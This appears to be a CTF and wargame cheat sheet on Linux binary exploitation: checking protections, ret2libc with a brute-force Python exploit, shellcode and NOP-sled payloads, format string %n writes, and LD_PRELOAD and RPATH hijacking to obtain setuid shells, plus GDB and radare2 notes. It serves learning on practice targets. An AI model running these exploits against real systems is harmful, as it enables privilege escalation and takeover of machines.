Binary Exploitation
This post (Work in Progress) lists the tips and tricks while doing Binary Exploitation challenges during various CTF’s and Over The Wire Wargame.
Thanks to superkojiman, barrebas, et0x who helped me learning the concepts.
Basics
Let’s start with some basic concepts and then we would see some examples which would help to clear the concepts.
Big-endian systems store the most significant byte of a word in the smallest address and the least significant byte is stored in the largest address. Little-endian systems, in contrast, store the least significant byte in the smallest address. {% img left /images/big-endian.png 250 250 %} {% img right /images/little-endian.png 250 250 %}
Initial Checks?
When you get a binary for exploitation, we need to find whether it is 32-bit or 64-bit ELF, which platform it is running, whether any buffer overflow prevention techniques has been used, what is EIP offset.
Binary Architecture
Executable binary is running on whether x86 or x86-64.
uname -a
Whether the binary is compiled for 32 bit or 64 bit.
file binary_file
Binary Help?
Probably a good idea to just run the binary with -h or –help flag to check if any help documentation is provided.
$ ./flagXX -h
Usage: php [options] [-f] <file> [--] [args...]
php [options] -r <code> [--] [args...]
Binary Protection
Multiple Buffer overflow prevention techniques such as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout Randomization (ASLR) and Position Independent Executables (PIE).
Address space Layout Randomization : Kernel
Executable Stack Protection : Compiler
Stack smashing protection : Compiler
Position Independent Executables : Compiler
Fortify Source : Compiler
Stack Protector : Compiler
Which buffer overflow prevention techniques are used can be found by running Checksec Script. This script is present in gdb-peda.
Whether the stack of binary is executable is not can be found by readelf tool. If Program header GNU_STACK has RWE flag, if it has E flag, it’s executable.
narnia8@melinda:~$ readelf -l /narnia/narnia8 | grep GNU_STACK GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10In order to make the stack executable, the program needs to be compiled with -z execstack option and to disable stack smashing option -fno-stack-protector should be used.
gcc -ggdb -m32 -fno-stack-protector -z execstack -o buffer1 buffer1.c
Address Space Layout Randomization (ASLR) controlled by /proc/sys/kernel/randomize_va_space.
Three Values: 0 : Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter. 1 : Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment. 2 : Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.You can change the setting temporarily by writing a new value to /proc/sys/kernel/randomize_va_space, for example:
echo value > /proc/sys/kernel/randomize_va_spaceTo change the value permanently, add the setting to /etc/sysctl.conf, for example:
kernel.randomize_va_space = value and run the sysctl -p command.If you change the value of randomize_va_space, you should test your application stack to ensure that it is compatible with the new setting. If necessary, you can disable ASLR for a specific program and its child processes by using the following command:
% setarch `uname -m` -R program [args ...]
PIE Enabled
If a binary is PIE enabled, we won’t be able to get the addresses until we run it. So, one of the way is to disable ASLR on linux, that way addresses are always the same during analysis.
Use the start command in gdb to load the binary and break at _start
then use vmmap (if using pwndbg) to see memory layout. If you want the starting address of binary
pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x555555554000 0x555555556000 r-xp 2000 0 /root/work/lucky/lucky 0x555555756000 0x555555757000 r-xp 1000 2000 /root/work/lucky/lucky 0x555555757000 0x555555758000 rwxp 1000 3000 /root/work/lucky/lucky
So starting address is 0x555555554000; from here we can set breakpoints by adding the offset in IDA.
You can see the offsets in IDA if you go to Options > General and check Line Prefixes
Now you can set a breakpoint. Eg if strcpy() is offset 0x123, then you can do
br *0x555555554000+0x123
EIP Offsets?
To know the EIP offset, you can use cyclic patterns. Use pattern_create.rb to create a random pattern which can be used to find the offset and pattern_offset.rb to find the exact offset.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37654136
[*] Exact match at offset 140
others
Check all the ways user input is provided to the program.
Check all the
printf
statement, see if there exists aprintf
that directly prints the user input (possible format string vulnerability).Check how the flag or input is stored? Stack (variable/reading a file?) or heap? (dynamic allocation - malloc).
Integar Overflow
A Signed Integer, which has a range between
-2,147,483,648
to2,147,483,647
.Signed integers use the first bit to store whether it is negative or positive,
0
indicating positive and1
indicating negative.What happens if you add
1
to2,147,483,647
and store the result in a signed integer? Well the first bit goes from0
to1
, meaning that the number is now negative! In fact, due to the way Two’s Complement, the method used to represent negative numbers in binary, works, it actually wraps around to the most negative integer:-2,147,483,648
.
Example
if(auction_choice == 1){
printf("These knockoff Flags cost 900 each, enter desired quantity\n");
int number_flags = 0;
fflush(stdin);
scanf("%d", &number_flags);
if(number_flags > 0){
int total_cost = 0;
total_cost = 900*number_flags;
printf("\nThe final cost is: %d\n", total_cost);
if(total_cost <= account_balance){
account_balance = account_balance - total_cost;
printf("\nYour current balance after transaction: %d\n\n", account_balance);
}
else{
printf("Not enough funds to complete purchase\n");
}
}
}
else if(auction_choice == 2){
printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
if(bid == 1){
if(account_balance > 100000){
print("Flag is XXX Read from file and print")
else{
printf("\nNot enough funds for transaction\n\n\n");
}}
In the above example, if we see our account_balance should be greater than 100000
(inital balance is 1000
). Here total_cost
is int and having a range of 2,147,483,647
As total_cost = 900*number_flags
, we can roughly calculate the number of flags to overflow totalcost by dividing 2,147,483,647
by 900
Buffer overflow
Executable Stack
Either you can put the shellcode on the buffer and then redirect the EIP to NOP Sled followed by the shellcode (provided the shellcode used is correct and the stack is executable).
Non-executable stack, ASLR Disabled
However, if the stack is not executable or the shellcode is not working (happens sometimes), then we can either,
Export a environment variable
Export a environment variable with shellcode.
Find the address of env variable in the stack. Utilize getenvaddr.c to get the address of the environment variable
---getenvaddr.c--- #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char *ptr; if (argc < 3) { printf("Usage: %s <environment var> <target program name>\n", argv[0]); exit(0); } else { ptr = getenv(argv[1]); /* Get environment variable location */ ptr += (strlen(argv[0]) - strlen(argv[2])) * 2; /* Adjust for program name */ printf("%s will be at %p\n", argv[1], ptr); } }
Set the return address to starting of the shellcode
Get a shell
Return2libc
Use return2libc which is a type of ROP
Find the address of system function (Run “gdb -q ./program”; break main; p system)
gdb -q ./retlib (no debugging symbols found)...(gdb) (gdb) b main Breakpoint 1 at 0x804859e (gdb) r Starting program: /home/c0ntex/retlib (no debugging symbols found)...(no debugging symbols found)... Breakpoint 1, 0x0804859e in main () (gdb) p system $1 = {<text variable, no debug info>} 0x28085260 <system>
Find the address of “/bin/sh” in the stack or export it in the environment variable and execute it like system(“/bin/sh”). It is in the format of
<ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]> 4Arbitrary Bytes for Return address could be a JUNK address or "\xCC\xCC\xCC\xCC" or address of exit function.The above pattern is because, when a function is called a stack frame is formed and the parameters for it are pushed onto the stack, followed by the return address(EIP) of your previous function along with your Stack Pointers(ebp, esp). with you Stack Pointer being on top of the frame.
Top of stack lower memory address Buffer .... Saved Frame Pointer (EBP) Saved Return address (EIP) Function() arguments Function() arguements Bottom of stack higher memory address
If Return Address set to
\xCC\xCC\xCC\xCC so after system executes, it tries to return to 0xcccccccc. \xcc is good just to check if you’re actually jumping to your shellcode, but once you’ve verified that it works, then you should remove it. ret expects an address. not a payload, xCCxCCxCCxCC should be present as a payload.
If a JUNK address is put, the binary will have already executed the shellcode but it will segfault.
If the proper address of exit() is used, binary will exit cleanly.
It’s better to use /bin/sh instead of /bin/bash since bash drops privs. If /bin/bash is used, it will launch /bin/bash but you’ll find that you haven’t elevated your privileges and this can get confusing. so either find another string that points to /bin/sh or set your own env variable like DASH=/bin/sh and reference that. Good paper to review is Bypassing non-executable-stack during Exploitation (return-to-libc) and Performing a ret2libc Attack
Sometimes you need to put a cat to keep the shell alive
(cat input; cat) | ./binary input is the payload you are sending.
Return-Oriented Programming
Msfelfscan can be used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits.
/usr/share/framework2/msfelfscan -f stack7
Usage: /usr/share/framework2/msfelfscan <input> <mode> <options>
Inputs:
-f <file> Read in ELF file
Modes:
-j <reg> Search for jump equivalent instructions
-s Search for pop+pop+ret combinations
-x <regex> Search for regex match
-a <address> Show code at specified virtual address
Options:
-A <count> Number of bytes to show after match
-B <count> Number of bytes to show before match
-I address Specify an alternate base load address
-n Print disassembly of matched data
We can use msfelfscan to get pop-pop-retun, choose that address and use
pop-pop-ret-addr | 8 bytes junk | address to execute |
where address-to-execute is the address of the environment variable where shellcode is stored.
Non-Executable Stack, ASLR Enabled
If the aslr is enabled, the address for the libc would change everytime, the binary is executed.
for i in `seq 1 5`; do ldd ovrflw | grep libc; done
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb762f000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb758f000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ae000)
However, if we notice the libc address in not changing much, first three characters and last three characters remain the same. Because, the machine we are doing would be probably a CTF machine, so we can brute-force the possible libc address. It is suggested to figure out the offset of system, exit and string “/bin/sh” from the libc base address. Remember,
<ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>
Find the offset of system, exit and /bin/sh
System
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
246: 00113d70 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
628: 0003ab40 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1461: 0003ab40 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
Exit function
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
112: 0002ec00 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e7f0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
451: 0002ec30 181 FUNC GLOBAL DEFAULT 13 __cxa_thread_atexit_impl@@GLIBC_2.18
559: 000b1645 24 FUNC GLOBAL DEFAULT 13 _exit@@GLIBC_2.0
617: 00116de0 56 FUNC GLOBAL DEFAULT 13 svc_exit@@GLIBC_2.0
652: 00120b60 33 FUNC GLOBAL DEFAULT 13 quick_exit@GLIBC_2.10
654: 0002ebd0 33 FUNC GLOBAL DEFAULT 13 quick_exit@@GLIBC_2.24
878: 0002ea20 85 FUNC GLOBAL DEFAULT 13 __cxa_atexit@@GLIBC_2.1.3
1048: 00120b20 52 FUNC GLOBAL DEFAULT 13 atexit@GLIBC_2.0
1398: 001b3204 4 OBJECT GLOBAL DEFAULT 33 argp_err_exit_status@@GLIBC_2.1
1510: 000f4130 58 FUNC GLOBAL DEFAULT 13 pthread_exit@@GLIBC_2.0
2112: 001b3150 4 OBJECT GLOBAL DEFAULT 33 obstack_exit_failure@@GLIBC_2.0
2267: 0002e820 78 FUNC WEAK DEFAULT 13 on_exit@@GLIBC_2.0
2410: 000f54f0 2 FUNC GLOBAL DEFAULT 13 __cyg_profile_func_exit@@GLIBC_2.2
String /bin/sh
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15cdc8 /bin/sh
Now, we know the offset of the system, exit and /bin/sh
1461: 0003ab40 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
141: 0002e7f0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
15cdc8 /bin/sh
Creation of exploit
Now, when we have the offset, let’s take a sample libc address and create the exploit
from subprocess import call
import struct
#---Offsets of System, Exit and /bin/sh
libc_base_addr = 0xb75e6000
system_offset = 0x0003ab40
exit_offset = 0x0002e7f0
binsh_offset = 0x0015cdc8
#---Calculation of System, Exit, binsh addr
system_addr = struct.pack("<I",libc_base_addr + system_offset)
exit_addr = struct.pack("<I",libc_base_addr + exit_offset)
binsh_addr = struct.pack("<I",libc_base_addr + binsh_offset)
#---Creating the payload
buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += binsh_addr
Calling the targetted binary multiple times
#---Execution of the binary multiple times
i = 0;
while(i<512):
print "Try :%s" %i
i = i+1
ret = call(["/usr/local/bin/ovrflw",buf])
Sometimes we need a shellcode to write a string or for getting a actual shell. A good reference can be found Introduction to Writing Shellcode Information about various system call integar value need to be present in EAX register is Linux System Call Table
Let’s see a small example where we move an address to eax register and jump to it. Address which we are moving to eax would contain our shellcode.
;test.asm [SECTION .text] global _start _start: mov eax, 0xffffd8bc jmp eaxJust good to know: global directive is NASM specific. It is for exporting symbols in your code to where it points in the object code generated. Here you mark _start symbol global so its name is added in the object code (a.o). The linker (ld) can read that symbol in the object code and its value so it knows where to mark as an entry point in the output executable. When you run the executable it starts at where marked as _start in the code.
If a global directive missing for a symbol that symbol will not be placed in the object code’s export table so linker has no way of knowing about the symbol. We can compile the asm file by
nasm -f elf test.asmlink it
ld -o test test.oIf you get the below error
ld: i386 architecture of input file `test.o' is incompatible with i386:x86-64 outputeither
Use 64 bits instead of 32 for your loader and compile it with the following command:
nasm -f elf64 loader.asm -o loader.oor
If want compile the file as 32 bits composition, you can use:
ld -m elf_i386 -s -o file.o fileTo see the byte code
objdump -d <file>
What we mostly do when exploiting a buffer overflow (when placing the shellcode on stack) is we place our shellcode before EIP, we should also check if we can put our shellcode after EIP. This is particularly useful when some kind of check for shellcode is present in address before EIP. Example: Suppose our EIP is present at offset 80. We would usually do
python -c 'print "\x90"*50 + "30 Bytes of ShellCode" + "4 Bytes return address to NOP or shellcode in left"'However, if somekind of check for alphanumeric characters is present for first 80 bytes you won’t be able to put your shellcode in those 80 bytes. At that point of time you should check if you can overflow post EIP and redirect. For example
python -c 'print "A"*80 + "4 Bytes return address to NOP or shellcode in right" + "\x90"*50 + "30 Bytes of ShellCode"'
Format String Vulnerability
Definition
If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present. By doing so, the behaviour of the format function is changed, and the attacker may get control over the target application. A format string is an ASCIIZ string that contains text and format parameters. Example:
printf ("The magic number is: %d\n", 1911);
Behaviour of the format function
The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack.
printf ("Number %d has no address, number %d has: %08x\n", i, a, &a);
From within the printf function the stack looks like:
stack top
. . .
<&a>
<a>
<i>
A
. . .
stack bottom
Crashing the Program
By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like:
printf ("%s%s%s%s%s%s%s%s%s%s%s%s");
Because ‘%s’ displays memory from an address that is supplied on the stack, where a lot of other data is stored, too, our chances are high to read from an illegal address, which is not mapped.
Viewing the stack
How some parts of the stack memory by using a format string like this:
printf ("%08x.%08x.%08x.%08x.%08x\n");
This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like:
40012980.080628c4.bffff7a4.00000005.08059c04
This is a partial dump of the stack memory, starting from the current bottom upward to the top of the stack — assuming the stack grows towards the low addresses.
Viewing Memory at any location
We can look at memory locations different from the stack memory by providing an address to the format string.
Our format string is usually located on the stack itself, so we already have near to full control over the space, where the format string lies. The format function internally maintains a pointer to the stack location of the current format parameter. If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ‘%s’ parameter. To modify the stack pointer we can simply use dummy parameters that will ‘dig’ up the stack by printing junk:
printf ("AAA0AAA1_%08x.%08x.%08x.%08x.%08x");
The ‘%08x’ parameters increase the internal stack pointer of the format function towards the top of the stack. After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ‘%s’ to our string. In our case the address is illegal and would be ‘AAA0’. Lets replace it with a real one. Example:
address = 0x08480110
address (encoded as 32 bit le string): "\x10\x01\x48\x08"
printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
Will dump memory from 0x08480110 until a NUL byte is reached. If we cannot reach the exact format string boundary by using 4-Byte pops (‘%08x’), we have to pad the format string, by prepending one, two or three junk characters. 3 This is analog to the alignment in buffer overflow exploits.
Overwriting of Arbitrary Memory
There is the ‘%n’ parameter, which writes the number of bytes already printed, into a variable of our choice. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address:
"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. We have reached one of our goals: we can write to arbitrary addresses. By using a dummy parameter ‘%nu’ we are able to control the counter written by ‘%n’, at least a bit.
Direct Parameter Access
The direct parameter access is controlled by the ‘$’ qualifier
printf ("%6`\ d:raw-latex:`\n`", 6, 5, 4,3, 2, 1);
Prints ‘1’, because the ‘6$’ explicitly addresses the 6th parameter on the stack.
The above text is taken from and a good paper to read for format string is Exploiting Format String Vulnerabilities
Write two bytes
We can write two bytes by %hn and one byte by %hhn.
Write four bytes
How to write four bytes? Suppose we need to write 0x8048706 to the address 0xffffd64c.
HOB:0x0804 LOB:0x8706
If HOB < LOB
[addr+2][addr] = \x4e\xd\xff\xff\x4c\xd\xff\xff
%.[HOB - 8]x = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]`\ hn = %7$hn
python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" +"%.2044x%6\$hn %.32514x%7\$hn"'
Heap Exploitation
Appendix
GDB Basics
Getting inputs
Taken from Managing inputs for payload injection?
Getting inputs from char *argv[]
We can read the arguments from the initial command line
$> ./program $(python -c 'print("\xef\xbe\xad\xde")')
In gdb, we can pass the arguments through the run command line:
(gdb) run $(python -c 'print("\xef\xbe\xad\xde")')
Getting inputs from a file
We can also provide input from file
$> ./program ./myfile.txt
And, within gdb
(gdb) run myfile.txt
Then, outside of gdb you can rewrite the content of the file and run your program again and again in gdb.
Getting inputs from stdin
Getting the input through stdin can be achieve through a wide variety of functions such as fgets(), scanf(), getline(), read() and others. It raises a few problems because the program stop while executing and wait to be fed with characters.
In case you have to deal with several inputs (eg login, password, …), you need to use separators between the inputs. Usually the separator between each input is just a newline character (n or r depending on the system you are in).
Now, you have two ways of doing to feed the stdin. Either we pass the file
$> cat ./mycommands.txt | ./program
The stdin requires to run the command either through a file
(gdb) run < ./mycommands.txt
And do as said in the previous case.
The other option is to pipe the output of a command to the stdin of the program
$> python -c 'print("\xef\xbe\xad\xde")' | ./program
In gdb we can use the bash process substitution <(cmd) trick:
(gdb) run < <(python -c 'print("\xef\xbe\xad\xde")')
This way is much quicker than effectively creating a named pipe and branch your program on it. Creating the named pipe outside of gdb requires a lot of unnecessary steps where you have it instantly with the previous technique.
Note also that, some people are using <<$(cmd) like this:
(gdb) run <<< $(python -c 'print("\xef\xbe\xad\xde")')
But, this last technique seems to filter out all NULL bytes (for whatever reason), so you should prefer the first one (especially if you want to pass NULL bytes).
Getting inputs from network
We can use netcat nc. Basically, if your vulnerable program is listening on localhost:666 then the command line would be:
$> python -c 'print("\xef\xbe\xad\xde")' | nc -vv localhost 666
Within gdb, the point will be to run (r) the program and to connect to it from another terminal.
Keep the stdin open after injection
Most of the techniques for stdin will send the exploit string to the program which will end shortly after the termination of the input. This mainly happens in gets buffer overflow, so, the stdin should be closed and reopened. The best way to keep it open afterward and get an active shell is to add a cat waiting for input on its stdin. It should look like this if you go though a file:
$> (cat ./mycommands.txt; cat) | ./program
Or, if you want a shell command:
$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | ./program
Or, finally, if you are going through the network:
$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | nc -vv localhost 666
Examining Data
Examining functions
info functions command : Dislays the list of functions in the debugged program
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x00000000000005a0 _init
0x00000000000005d0 setresgid@plt
0x00000000000005e0 system@plt
0x00000000000005f0 printf@plt
0x0000000000000600 getegid@plt
0x0000000000000620 _start
0x0000000000000650 deregister_tm_clones
0x0000000000000690 register_tm_clones
0x00000000000006e0 __do_global_dtors_aux
0x0000000000000720 frame_dummy
0x000000000000072a vuln
0x0000000000000765 main
0x00000000000007c0 __libc_csu_init
0x0000000000000830 __libc_csu_fini
0x0000000000000834 _fini
Run it before running the program, otherwise all linked functions would also be shown.
Disassembling Functions
GDB
disassemble main
GDB-Peda
pdisass main
Examining Memory
We can use the command x (for “examine”) to examine memory in any of several formats, independently of your program’s data types.
x/nfu addr
x addr
x
Use the x command to examine memory.
n, f, and u are all optional parameters that specify how much memory to display and how to format it; addr is an expression giving the address where you want to start displaying memory.
n, the repeat count : The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units u) to display.
f, the display format : The display format is one of the formats used by print, ‘s’ (null-terminated string), or ‘i’ (machine instruction). The default is ‘x’ (hexadecimal) initially. The default changes each time you use either x or print.
u, the unit size : The unit size is any of
b Bytes.
h Halfwords (two bytes).
w Words (four bytes). This is the initial default.
g Giant words (eight bytes).
Examining Data
Sometimes, you need to know the address of the variable, inorder to write arbitary value in to it.
run gdb <program> p &<variablename>
We can also use
(gdb) info address variable_name
Symbol "variable_name" is static storage at 0x903278.
Find the address of a string using GDB?
(gdb) info proc map
process 930
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /myapp
0x600000 0x601000 0x1000 0x0 /myapp
0x601000 0x602000 0x1000 0x1000 /myapp
0x7ffff7a1c000 0x7ffff7bd2000 0x1b6000 0x0 /usr/lib64/libc-2.17.so
0x7ffff7bd2000 0x7ffff7dd2000 0x200000 0x1b6000 /usr/lib64/libc-2.17.so
0x7ffff7dd2000 0x7ffff7dd6000 0x4000 0x1b6000 /usr/lib64/libc-2.17.so
0x7ffff7dd6000 0x7ffff7dd8000 0x2000 0x1ba000 /usr/lib64/libc-2.17.so
(gdb) find 0x7ffff7a1c000,0x7ffff7bd2000,"/bin/sh"
0x7ffff7b98489
1 pattern found.
(gdb) x /s 0x7ffff7b98489
0x7ffff7b98489: "/bin/sh"
(gdb) x /xg 0x7ffff7b98489
0x7ffff7b98489: 0x0068732f6e69622f
Examining Frames
Here we would interpret GDB “info frame” output?
(gdb) info frame
Stack level 0, frame at 0xb75f7390:
eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a
called by frame at 0xb75f73b0
source language c++.
Arglist at 0xb75f7388, args: this=0x0
Locals at 0xb75f7388, Previous frame's sp is 0xb75f7390
Saved registers:
ebp at 0xb75f7388, eip at 0xb75f738c
stack level 0 : frame num in backtrace, 0 is current executing frame, which grows downwards, in consistence with the stack.
frame at 0xb75f7390 : starting memory address of this stack frame
eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a : eip is the register for next instruction to execute (also called program counter). so at this moment, the next to execute is at “0x804877f”, which is line 16 of testing.cpp.
saved eip “0x804869a” is so called “return address”, i.e., the instruction to resume in caller stack frame after returning from this callee stack. It is pushed into stack upon “CALL” instruction (save it for return).
called by frame at 0xb75f73b0 : the address of the caller stack frame
source language c++ : which language in use
Arglist at 0xb75f7388, args: this=0x0 : the starting address of arguments
Locals at 0xb75f7388 : address of local variables.
Previous frame’s sp is 0xb75f7390 : this is where the previous frame´s stack pointer point to (the caller frame), at the moment of calling, it is also the starting memory address of called stack frame.
Saved registers : These are the two addresses on the callee stack, for two saved registers.
ebp at 0xb75f7388 that is the address where the “ebp” register of the caller´s stack frame saved (please note, it is the register, not the caller´s stack address). i.e., corresponding to “PUSH %ebp”. “ebp” is the register usually considered as the starting address of the locals of this stack frame, which use “offset” to address. In another word, the operations of local variables all use this “ebp”, so you will see something like mov -0x4(%ebp), %eax, etc.
eip at 0xb75f738c as mentioned before, but here is the address of the stack (which contains the value “0x804877f”).
Examining Registers
We can refer to machine register contents, in expressions, as variables with names starting with ‘$’. The names of registers are different for each machine; use info registers to see the names used on your machine.
info registers : Print the names and values of all registers except floating-point registers (in the selected stack frame).
info all-registers : Print the names and values of all registers, including floating-point registers.
info registers regname … : Print the relativized value of each specified register regname. As discussed in detail below, register values are normally relative to the selected stack frame. regname may be any register name valid on the machine you are using, with or without the initial ‘$’.
Setting program variable
Either
set variable i = 10
or update arbitary (writable) location by address
(gdb) set {int}0x83040 = 4
Radare2 Basics
r2 -Ad ./crackme0x01 : Opens r2 in debug mode with the Analyze all flag active
afll : Lists all functions and their location in memory
s sym.main : Seeks to function sym.main. Address in prompt will change
pdf @ sym.main (which means something like “show me the main function without seek to it”) could be used.
pdf : "Print Disassembling Function"
iz : Shows the strings present in the data section. One can use izz to see the strings for the entire binary
db 0x12345678 : Sets a breakpoint at address 0x12345678. It's possible to set more than one breakpoint
dc : Runs the program until it hits a breakpoint
dr : Shows the content of all registers. Use dr <register> for a specific register
afvd : Shows the content of all local/args variables
pf Prints formatted data. Use pf?? to see available formats and pf??? for examples
? 0x10 Converts the number 0x10 to the most common bases
Appendix-II LD_PRELOAD
Hijacking Functions
Let’s say there’s a function getrand which generates a random path for the files to be stored
int getrand(char **path)
{
char *tmp;
int pid;
int fd;
srandom(time(NULL));
tmp = getenv("TEMP");
pid = getpid();
asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
'A' + (random() % 26), '0' + (random() % 10),
'a' + (random() % 26), 'A' + (random() % 26),
'0' + (random() % 10), 'a' + (random() % 26));
fd = open(*path, O_CREAT|O_RDWR, 0600);
unlink(*path);
return fd;
}
If we see the above function, getpid figures out the PID of the program, unlink deletes the file and random provides a random number.
We also need to check if the binary is dynamically linked or not?
file /home/flagXX/flagXX
/home/flagXX/flagXX: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
If so, then we can create a c file to override the functions we want – random(), unlink() and getpid():
hacking_randomfile.c
// Take control of random
int random(){
return 0;
}
// Stop the file being deleted
int unlink(const char *pathname) {
return 0;
}
// Take control of the reported PID
int getpid() {
return 1;
}
Now, we need to compile this with
gcc hacking_randomfile.c -o hacking_randomfile -shared -fPIC
Using gcc we’ve specified the normal input file (hacking_randomfile.c) and output file (-o hacking_randomfile), but we’ve also specified two additional options:
-shared to make a library and
-fPIC to specify Position Independent Code, which is necessary for making a shared library.
Now that we’ve built hacking_randomfile as a shared library, here’s the basic usage:
$ LD_PRELOAD="$PWD/hacking_randomtime" ./main_targetfile
SANS has written a blog about Go To The Head Of The Class: LD_PRELOAD For The Win
Important things to note
Function definition should be correct
Funtion input and return type should also be correct.
Controlling uninitialized memory with LD_PRELOAD
Dan Rosenberg has documented this technique at Controlling uninitialized memory with LD_PRELOAD The below stuff is directly taken from the blog post.
A local Linux user can exercise a degree of control over uninitialized memory on the stack when executing a program. This happens because of the way the Linux linker/loader, ld.so, handles the LD_PRELOAD environment variable. This variable allows users to specify libraries to be preloaded, effectively allowing users to override functions used in a particular binary. However, regardless of whether or not libraries specified via LD_PRELOAD are actually loaded at runtime, ld.so copies the name of each library onto the stack prior to executing the program, and doesn’t clean up after itself. By specifying a very long LD_PRELOAD variable and executing a binary, a portion of the stack will be overwritten with part of the LD_PRELOAD variable during linking, and it will stay that way once execution of the program begins, even on setuid binaries, where the library itself is not loaded.
This means we can initialise the memory to something under out control:
$ export LD_PRELOAD=`python -c 'print "/bin/getflag\x0a"*1000'`
i.e. fill the stack with one thousand /bin/getflags.
Then when we run flagXX with length of 1, it will almost certainly have this in the buffer already:
$ echo -ne "Content-Length: 1\n " | /home/flagXX/flagXX
sh: !getflag: command not found
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
... lots of repeats ...
sh: line 74: /bin/getfl=qm: No such file or directory
Of course, the LD_PRELOAD variable is ignored with setuid binaries, since otherwise an attacker could trivially override arbitrary functions in setuid binaries and easily take control of a system.
LIBC - Rpath
If there’s exist a suid binary with a RPATH defined which we control, we can get code execution. Let’s first read what’s rpath?
RPATH
rpath designates the run-time search path hard-coded in an executable file or library. Dynamic linking loaders use the rpath to find required libraries. Specifically it encodes a path to shared libraries into the header of an executable (or another shared library). This RPATH header value (so named in the Executable and Linkable Format header standards) may either override or supplement the system default dynamic linking search paths.
Libraries loaded from the run-time path defined by RPATH wont disable the setuid execution as LDPRELOAD would do. So we can inject our own libc.so.6 (Using version GLIBC2.0 as required by the binary) in the RPATH directory and hook any of the used functions to execute our setuid shell.
We can use readelf to check the dynamic section of a binary
readelf -d flagXX
Dynamic section at offset 0xf20 contains 21 entries:
Tag Type Name/Value
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flagXX]
0x0000000c (INIT) 0x80482c0
In the above example, we can see that RPATH is defined as /var/tmp/flagXX, so the binary tries to load the libc.so.6 from that location.
Let’s see what are the functions the binary utilizes from libc
objdump -R flagXX
flagXX: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049ff0 R_386_GLOB_DAT __gmon_start__
0804a000 R_386_JUMP_SLOT puts
0804a004 R_386_JUMP_SLOT __gmon_start__
0804a008 R_386_JUMP_SLOT __libc_start_main
If RPATH is writeable, we can possibly get a shell by creating a fake libc.so and defining fake __libc_start_main function with
system("/bin/sh");
to get a shell. We may also refer Linux x86 Program Start Up or - How the heck do we get to main()? to understand what happens when we execute a linux binary (shared not static).
libc_start_main
